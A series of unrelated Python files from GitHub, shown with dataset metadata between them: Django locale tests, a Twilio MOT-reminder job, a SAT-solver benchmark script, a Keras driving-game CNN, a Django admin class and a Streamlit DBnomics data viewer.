def test_numeric():
    """nl_langinfo() must agree with the C library for numeric items."""
    for loc in CANDIDATE_LOCALES:
        lc_norm = _normalize(loc)
        _set_locale(locale.LC_NUMERIC, lc_norm)
        setlocale(loc)
        # short
        for what in (locale.ALT_DIGITS, locale.RADIXCHAR, locale.THOUSEP):
            nl = nl_langinfo(what)
            lo = locale.nl_langinfo(what)
            assert nl == lo, '%s (%s): %r != %r' % (loc, lc_norm, nl, lo)
    #
    # for
    #


@nose.with_setup(setup_num, tear_down_num)
def test_monetary():
    """localeconv() must mirror the stdlib's localeconv() key for key."""
    for loc in CANDIDATE_LOCALES:
        lc_norm = _normalize(loc)
        _set_locale(locale.LC_NUMERIC, lc_norm)
        setlocale(loc)
        # short
        nl = locale.localeconv()
        li = localeconv()
        for k, v in nl.items():
            assert v == li[k], '%s (%s): %s %r != %r' % (loc, lc_norm, k, v, li[k])
    #
    # for
    #
@nose.with_setup(setup_tm, tear_down_tm)
def test_date_time_format():
    """Date/time format strings must match the C library per locale."""
    for loc in CANDIDATE_LOCALES:
        lc_norm = _normalize(loc)
        _set_locale(locale.LC_TIME, lc_norm)
        setlocale(loc)
        for what in (
            locale.D_T_FMT, locale.D_FMT, locale.T_FMT, locale.T_FMT_AMPM,
        ):
            nl = nl_langinfo(what)
            lo = locale.nl_langinfo(what)
            assert nl == lo, '%r != %r' % (nl, lo)
    #
    #
    #


@nose.with_setup(setup_tm, tear_down_tm)
def test_day_names():
    """Full and abbreviated weekday names must match the C library."""
    for loc in CANDIDATE_LOCALES:
        lc_norm = _normalize(loc)
        _set_locale(locale.LC_TIME, lc_norm)
        setlocale(loc)
        for what in (
            locale.DAY_1, locale.DAY_2, locale.DAY_3, locale.DAY_4, locale.DAY_5, locale.DAY_6, locale.DAY_7,
            locale.ABDAY_1, locale.ABDAY_2, locale.ABDAY_3, locale.ABDAY_4, locale.ABDAY_5, locale.ABDAY_6, locale.ABDAY_7,
        ):
            nl = nl_langinfo(what)
            lo = locale.nl_langinfo(what)
            assert nl == lo, '%r != %r' % (nl, lo)
    #
    #
    #


@nose.with_setup(setup_tm, tear_down_tm)
def test_month_names():
    """Full and abbreviated month names must match the C library."""
    for loc in CANDIDATE_LOCALES:
        lc_norm = _normalize(loc)
        _set_locale(locale.LC_TIME, lc_norm)
        setlocale(loc)
        for what in (
            locale.MON_1, locale.MON_2, locale.MON_3, locale.MON_4, locale.MON_5, locale.MON_6, locale.MON_7, locale.MON_8, locale.MON_9, locale.MON_10, locale.MON_11, locale.MON_12,
            locale.ABMON_1, locale.ABMON_2, locale.ABMON_3, locale.ABMON_4, locale.ABMON_5, locale.ABMON_6, locale.ABMON_7, locale.ABMON_8, locale.ABMON_9, locale.ABMON_10, locale.ABMON_11, locale.ABMON_12,
        ):
            nl = nl_langinfo(what)
            lo = locale.nl_langinfo(what)
            assert nl == lo, '%r != %r' % (nl, lo)
    #
    #
    #


@nose.with_setup(setup_tm, tear_down_tm)
def test_era():
    """Era-related format strings must match the C library."""
    for loc in CANDIDATE_LOCALES:
        lc_norm = _normalize(loc)
        _set_locale(locale.LC_TIME, lc_norm)
        setlocale(loc)
        for what in (
            locale.ERA, locale.ERA_D_T_FMT, locale.ERA_D_FMT,
        ):
            nl = nl_langinfo(what)
            lo = locale.nl_langinfo(what)
            assert nl == lo, '%r != %r' % (nl, lo)
    #
    #
    #
def test_sr_number_format():
    """Serbian uses ',' as decimal point and '.' as thousands separator."""
    setlocale('sr')
    td = (
        # w/o grouping
        (("%f", 1024), '1024,000000'),
        (("%f", 102), '102,000000'),
        (("%f", -42), '-42,000000'),
        (("%+f", -42), '-42,000000'),
        (("%20.f", -42), '                 -42'),
        (("%+10.f", -4200), '     -4200'),
        (("%-10.f", 4200), '4200      '),
        # with grouping
        (("%f", 1024, 1), '1.024,000000'),
        (("%f", 102, 1), '102,000000'),
        (("%f", -42, 1), '-42,000000'),
        (("%+f", -42, 1), '-42,000000'),
        (("%20.f", -42, 1), '                 -42'),
        (("%+10.f", -4200, 1), '    -4.200'),
        (("%-10.f", 4200, 1), '4.200     '),
    )
    for args, res in td:
        assert format(*args) == res, '%r != %r' % (format(*args), res)
#
#
# DJANGO FUNCTIONALITY
# FIXME: specific number and date/time tests
| shula/citytree | contrib/nesh/localization/test_localization.py | test_localization.py | py | 7,157 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "django.conf.settings.configure",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.conf.settings",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "locale.setlocale",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "lo... |
32967621302 | from arcana_app.models import Truck
from twilio.rest import Client
from datetime import date, timedelta
def my_scheduled_job():
    '''
    Background task with interval set in settings. Sends an SMS exactly once
    per truck, on the day when 20 days are left before its MOT expires.

    Fix: the original referenced undefined names ``account_sid`` and
    ``auth_token`` (runtime NameError) and called ``messages.create`` without
    the required ``to``/``from_`` numbers.  Credentials and phone numbers are
    now read from environment variables; a missing variable raises KeyError.
    '''
    import os  # local import keeps the module's import block untouched

    account_sid = os.environ["TWILIO_ACCOUNT_SID"]
    auth_token = os.environ["TWILIO_AUTH_TOKEN"]
    from_number = os.environ["TWILIO_FROM_NUMBER"]
    to_number = os.environ["MOT_ALERT_TO_NUMBER"]

    trucks = Truck.objects.all()
    today = date.today()
    client = Client(account_sid, auth_token)  # one client for all messages
    for truck in trucks:
        # Exact-day match, so the reminder fires only once per truck.
        if (truck.expire_MOT - today) == timedelta(days=20):
            message = client.messages.create(
                body=f"{truck.color} {truck.brand} with reg numbers {truck.registration_number} has 20 days to MOT",
                from_=from_number,
                to=to_number,
            )
            print(message.sid)  # minimal trace of each sent message
{
"api_name": "arcana_app.models.Truck.objects.all",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "arcana_app.models.Truck.objects",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "arcana_app.models.Truck",
"line_number": 12,
"usage_type": "name... |
26009605425 | import datetime
import os
import subprocess
import time
import dimacs
start = time.time()
solved = 0
# Per result kind ("sat"/"unsat"): (filename, seconds) of the slowest solve.
hardest = {}
try:
    for file in dimacs.satlib_problems:
        file = os.path.join("C:\\satlib", file)
        print(file)
        dimacs.print_header(file)
        expected = dimacs.get_expected(file)
        # Run the external solver on the problem file and time it.
        cmd = "./ayane", file
        t = time.time()
        p = subprocess.run(
            cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding="utf-8"
        )
        t = time.time() - t
        print("%.3f seconds" % t)
        s = p.stdout
        print(s)
        code = p.returncode
        if code:
            # Nonzero exit from the solver aborts the whole batch.
            raise Exception(code)
        # "unsat..." does not start with "sat", so this order is safe.
        if s.startswith("sat"):
            r = "sat"
        elif s.startswith("unsat"):
            r = "unsat"
        else:
            raise Exception()
        dimacs.check(r, expected)
        solved += 1
        # Track the slowest successfully solved instance per result kind.
        if t > hardest.get(r, (0, 0))[1]:
            hardest[r] = file, t
except KeyboardInterrupt:
    # Ctrl-C ends the batch early but still prints the summary below.
    print()
print("Total time")
t = time.time() - start
print(datetime.timedelta(seconds=t))
print()
if hardest:
    print("Hardest solved")
    if "sat" in hardest:
        print("sat\t%s\t%.3f" % hardest["sat"])
    if "unsat" in hardest:
        print("unsat\t%s\t%.3f" % hardest["unsat"])
    print()
print(solved)
{
"api_name": "time.time",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "dimacs.satlib_problems",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line... |
29752162238 | # -*- coding: utf-8 -*-
"""
Created on Tue Jan 23 02:22:23 2018
@author: RAJAT
"""
import numpy as np
from time import time
from keras.models import Sequential
from keras.layers import Dense, Dropout , Activation,Flatten,Convolution2D, MaxPooling2D ,AveragePooling2D
from keras.callbacks import TensorBoard
# This is where we create the model for training purpose
# 1. we create a function self_driving
# returns a model
# 2. we create a function to save
# One-hot (1, 5) row vectors, one per key press; '.' means "no key pressed".
_KEYS = 'WSAD.'
move_encode = {
    key: np.array([1 if col == row else 0 for col in range(5)]).reshape(1, 5)
    for row, key in enumerate(_KEYS)
}
# Inverse lookup: argmax index -> key character.
move_decode = dict(enumerate(_KEYS))


def encode_movement(move):
    """Return the (1, 5) one-hot row for the first character of *move*.

    Empty input or an unknown key both map to the idle action '.'.
    """
    try:
        return move_encode[move[0]]
    except (KeyError, IndexError):
        return move_encode['.']
def self_driving(shape):
    """Build and compile the CNN mapping a game frame to one of 5 moves.

    Args:
        shape: input image shape, e.g. (height, width, channels).
    Returns:
        A compiled keras Sequential model with a softmax over the 5
        one-hot move classes (W/S/A/D/idle).
    """
    model = Sequential()
    # NOTE(review): input_shape is repeated on every Conv2D layer —
    # presumably only the first occurrence matters; confirm against Keras.
    model.add(Convolution2D(512 , kernel_size=(2,2), strides=(1,1) , padding='valid' , activation='relu', input_shape=shape))
    model.add(Convolution2D(128 , kernel_size=(1,1), strides=(1,1) , padding='valid' , activation='relu', input_shape=shape))
    model.add(Convolution2D(256 , kernel_size=(2,2), strides=(1,1) , padding='valid' , activation='relu', input_shape=shape))
    model.add(AveragePooling2D(pool_size=(2,2)))
    model.add(Convolution2D(64 , kernel_size=(1,1), strides=(1,1) , padding='valid' , activation='relu', input_shape=shape))
    model.add(Convolution2D(128 , kernel_size=(2,2), strides=(2,2) , padding='valid' , activation='relu', input_shape=shape))
    model.add(AveragePooling2D(pool_size=(2,2)))
    model.add(Convolution2D(32 , kernel_size=(1,1), strides=(1,1) , padding='valid' , activation='relu', input_shape=shape))
    model.add(Convolution2D(64 , kernel_size=(2,2), strides=(3,3) , padding='valid' , activation='relu', input_shape=shape))
    model.add(MaxPooling2D(pool_size=(2,2)))
    # Dense classification head on top of the convolutional features.
    model.add(Flatten())
    model.add(Dense(128, activation='relu'))
    model.add(Dense(256, activation='relu'))
    model.add(Dropout(0.25))
    model.add(Dense(128, activation='relu'))
    model.add(Dropout(0.25))
    model.add(Dense(64, activation='relu'))
    model.add(Dense(32, activation='relu'))
    model.add(Dense(5, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer='adam',
                  metrics=['accuracy'])
    return model
def save_model(model, name):
    """Persist *model* as <name>.json (architecture) + <name>.h5 (weights)."""
    serialized = model.to_json()
    json_path = name + ".json"
    with open(json_path, "w") as json_file:
        json_file.write(serialized)
    model.save_weights(name + ".h5")
    print("\n SAVED THE WEIGHTS AND MODEL !!!!")
def load_model_weights(name):
    """Rebuild a model from <name>.json + <name>.h5 and recompile it.

    Counterpart of save_model(); compile settings mirror self_driving().
    """
    from keras.models import model_from_json
    json_file = open(name+'.json', 'r')
    loaded_model_json = json_file.read()
    json_file.close()
    loaded_model = model_from_json(loaded_model_json)
    loaded_model.load_weights(name+".h5")
    loaded_model.compile(loss='categorical_crossentropy',
                         optimizer='adam',
                         metrics=['accuracy'])
    return loaded_model
if __name__ == '__main__':
    from datacollect import load_train_data
    X_train , Y_train = load_train_data()
    # Resume training from the saved checkpoint; swap the two lines below
    # to start from a fresh, untrained network instead.
    model = load_model_weights('v1_nfs_ai')
    #model = self_driving(X_train[0].shape)
    # 100 x 1-epoch fits, checkpointing after each pass.
    for i in range(100):
        model.fit(X_train, Y_train,
                  batch_size=30,nb_epoch=1, verbose=1)
        save_model(model , "v1_nfs_ai")
| rajatkb/STU-NET-Stupid-Neural-Net | edition 1 CNN= = = softmax/model.py | model.py | py | 3,722 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": ... |
34455433400 | # -*- coding: utf8 -*-
from django.contrib import admin
from models_app.models import Document
@admin.register(Document)
class DocumentAdmin(admin.ModelAdmin):
    # Columns shown in the Document changelist.
    list_display = [
        'id',
        'name',
        'file',
        'position',
        'task',
    ]
    # Both id and name link through to the change form.
    list_display_links = (
        'id',
        'name',
    )
    # Auto-managed fields: visible but never editable in the admin.
    readonly_fields = ['id', 'created_at', 'updated_at']
    ordering = ('id', 'position', 'task')
    list_filter = ('position', 'task')
| Aplles/project_tracker | models_app/admin/document/resources.py | resources.py | py | 472 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.contrib.admin.ModelAdmin",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.contrib.admin",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.contrib.admin.register",
"line_number": 6,
"usage_type": "call"
},
{
... |
32226927177 | import streamlit as st
import requests
import json
from dbnomics import fetch_series
import pandas as pd
from pandas.api.types import (
is_categorical_dtype,
is_datetime64_any_dtype,
is_numeric_dtype,
)
import altair as alt
st.set_page_config(page_title="DB Nomics Marco Data Vizualizer", layout="wide")

state = st.session_state
# Initialise navigation state once per session.  st.session_state persists
# across script reruns, so only fill in keys that are still missing.
# (Replaces four copy-pasted `if key not in state` branches.)
for _key in ("provider_code", "provider_name", "dataset_code", "dataset_name"):
    if _key not in state:
        state[_key] = ""
@st.experimental_memo
def get_providers():
    """Fetch all DBnomics providers (cached) as a list of (code, name)."""
    params = {"limit": "1000", "offset": "0"}
    response = requests.get("https://api.db.nomics.world/v22/providers",
                            params=params)
    # Fail loudly on HTTP errors instead of with a confusing JSON parse error.
    response.raise_for_status()
    providers = response.json()["providers"]["docs"]
    return [(provider["code"], provider["name"]) for provider in providers]
provider_details = get_providers()

selected_provider_name = st.selectbox(
    "Select a **provider**",
    [j for i, j in provider_details])
# Resolve the chosen display name back to its provider code.
# NOTE(review): if the name were ever absent, selected_provider_code would
# stay unbound — currently safe because the options come from the same list.
for item in provider_details:
    if item[1] == selected_provider_name:
        selected_provider_code = item[0]
        break


def change_provider(selected_provider_name, selected_provider_code):
    # Button callback: commit the chosen provider into the session state.
    state['provider_name'] = selected_provider_name
    state['provider_code'] = selected_provider_code


st.button("**Load datasets**", on_click=change_provider,
          args=(selected_provider_name, selected_provider_code,))
@st.experimental_memo
def get_datasets(provider_code):
    """Fetch up to 500 datasets for *provider_code* (cached).

    Returns:
        (dataset_details, datasets_number) where dataset_details is a list
        of 4-tuples consumed positionally by the UI code below.
    """
    params = {"limit": "500", "offset": "0"}
    response = requests.get(
        f"https://api.db.nomics.world/v22/datasets/{provider_code}",
        params=params)
    # Fail loudly on HTTP errors instead of with a confusing JSON parse error.
    response.raise_for_status()
    payload = response.json()
    datasets = payload["datasets"]["docs"]
    datasets_number = payload["datasets"]["num_found"]
    # NOTE(review): "nb_series" is deliberately kept twice to preserve the
    # 4-tuple shape, but downstream item[3] is displayed as "Last update" —
    # the 4th field probably ought to be an update timestamp (e.g.
    # "indexed_at"); confirm against the DBnomics API before changing.
    dataset_details = [(dataset["code"], dataset["name"], dataset["nb_series"],
                        dataset["nb_series"]) for dataset in datasets]
    return dataset_details, datasets_number
if state['provider_code'] == selected_provider_code:
    # Only hit the API once the user confirmed the provider via the button.
    dataset_details, datasets_number = get_datasets(state['provider_code'])

if "dataset_details" not in globals():
    # No provider loaded yet in this rerun: empty dataset-picker state.
    dataset_details = []
    selected_dataset_name = None
    selected_dataset_code = None
else:
    # NOTE(review): datasets_number is only bound when the branch above ran
    # in this same rerun — confirm this path cannot be reached without it.
    st.info(f"**Provider:** {state['provider_name']}"
            f"**Datasets:** {datasets_number}"
            f"**Link:** [DBNomics Provider Info]"
            f"(https://db.nomics.world/{state['provider_code']})"
            , icon="ℹ️")
    if datasets_number > 50:
        st.warning(f"This alpha version can only show the first 50 datasets "
                   f"of each provider. {state['provider_name']} "
                   f"has {datasets_number} datasets.")
    selected_dataset_name = st.selectbox(
        "Select a **dataset**",
        [j for i, j, k, o in dataset_details])
    # Resolve the chosen name to its (code, nb_series, updated) fields.
    for item in dataset_details:
        if item[1] == selected_dataset_name:
            selected_dataset_code = item[0]
            selected_dataset_series = item[2]
            selected_dataset_updated = item[3]
            break

if dataset_details != []:
    st.info(f"**Dataset Code:** {selected_dataset_code} "
            f"**Series in Dataset:** {selected_dataset_series} "
            f"**Last update:** {selected_dataset_updated} "
            f"**Link:** [DBNomics Dataset Info]('https://db.nomics.world/"
            f"{state['provider_code']}/"
            f"{selected_dataset_code}')",
            icon="ℹ️")
    if selected_dataset_series > 2000:
        st.warning("This dataset has more than 2000 series."
                   " Loading can take some time and might not be successful.")
@st.experimental_memo
def get_dataset_data(provider_code, dataset_code):
    # Cached fetch of every series in the dataset (hard cap: 10000 series).
    return fetch_series(provider_code, dataset_code, max_nb_series=10000)
def filter_dataframe(df: pd.DataFrame) -> pd.DataFrame:
    """
    Adds a UI on top of a dataframe to let viewers filter columns

    Args:
        df (pd.DataFrame): Original dataframe

    Returns:
        pd.DataFrame: Filtered dataframe
    """
    # Work on a copy so the cached original is never mutated.
    df = df.copy()

    modification_container = st.container()

    with modification_container:
        to_filter_columns = st.multiselect("Filter dataframe on", df.columns)
        for column in to_filter_columns:
            left, right = st.columns((1, 20))
            # Treat columns with < 40 unique values as categorical
            if is_categorical_dtype(df[column]) or df[column].nunique() < 40:
                user_cat_input = right.multiselect(
                    f"Values for {column}",
                    df[column].unique(),
                    default=list(df[column].unique()),
                )
                df = df[df[column].isin(user_cat_input)]
            elif is_numeric_dtype(df[column]):
                # Range slider over the column's min..max in 100 steps.
                _min = float(df[column].min())
                _max = float(df[column].max())
                step = (_max - _min) / 100
                user_num_input = right.slider(
                    f"Values for {column}",
                    min_value=_min,
                    max_value=_max,
                    value=(_min, _max),
                    step=step,
                )
                df = df[df[column].between(*user_num_input)]
            elif is_datetime64_any_dtype(df[column]):
                user_date_input = right.date_input(
                    f"Values for {column}",
                    value=(
                        df[column].min(),
                        df[column].max(),
                    ),
                )
                # date_input only yields a 2-tuple once both ends are picked.
                if len(user_date_input) == 2:
                    user_date_input = tuple(map(pd.to_datetime, user_date_input))
                    start_date, end_date = user_date_input
                    df = df.loc[df[column].between(start_date, end_date)]
            else:
                # Fallback for free-text columns: substring/regex match.
                user_text_input = right.text_input(
                    f"Substring or regex in {column}",
                )
                if user_text_input:
                    df = df[df[column].astype(str).str.contains(user_text_input)]

    return df
def get_data(provider_code, dataset_code):
    # Fetch the dataset, then overlay the interactive filter UI on it.
    df = get_dataset_data(provider_code, dataset_code)
    return filter_dataframe(df)


def change_dataset(selected_dataset_name, selected_dataset_code):
    # Button callback: commit the chosen dataset into the session state.
    state['dataset_name'] = selected_dataset_name
    state['dataset_code'] = selected_dataset_code


st.button("**Load data**",
          on_click=change_dataset,
          args=(selected_dataset_name,
                selected_dataset_code,))
if state['dataset_code'] != "":
    data = get_data(state['provider_code'], state['dataset_code'])
    st.dataframe(data)

    # Interval brush on the lower overview chart zooms the upper chart;
    # clicking legend entries highlights individual series.
    brush = alt.selection(type='interval', encodings=['x'])
    selection = alt.selection_multi(fields=['series_code'], bind='legend')

    # Detail view: one line per series, x-domain driven by the brush.
    upper = alt.Chart(data).mark_line().encode(
        x = alt.X('period:T', scale=alt.Scale(domain=brush)),
        y = 'value:Q',
        color = "series_code:N",
        opacity=alt.condition(selection, alt.value(1), alt.value(0.2))
    ).properties(
        width=1000,
        height=300,
    ).add_selection(
        selection
    )
    # Overview strip used only to drive the brush selection.
    lower = alt.Chart(data).mark_area().encode(
        x = 'period:T',
        y = 'max(value):Q'
    ).properties(
        width=1000,
        height=100,
    ).add_selection(brush)
    chart = upper & lower

    tab1, tab2 = st.tabs(["Chart 1", "Chart 2"])
    with tab1:
        st.altair_chart(chart, theme="streamlit", use_container_width=True)
    with tab2:
        st.write("Test")  # placeholder for a second chart
| Silvan-Fischer/MacroDataViz | MarcoDataViz.py | MarcoDataViz.py | py | 8,039 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "streamlit.set_page_config",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "streamlit.session_state",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "requests.get",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "j... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.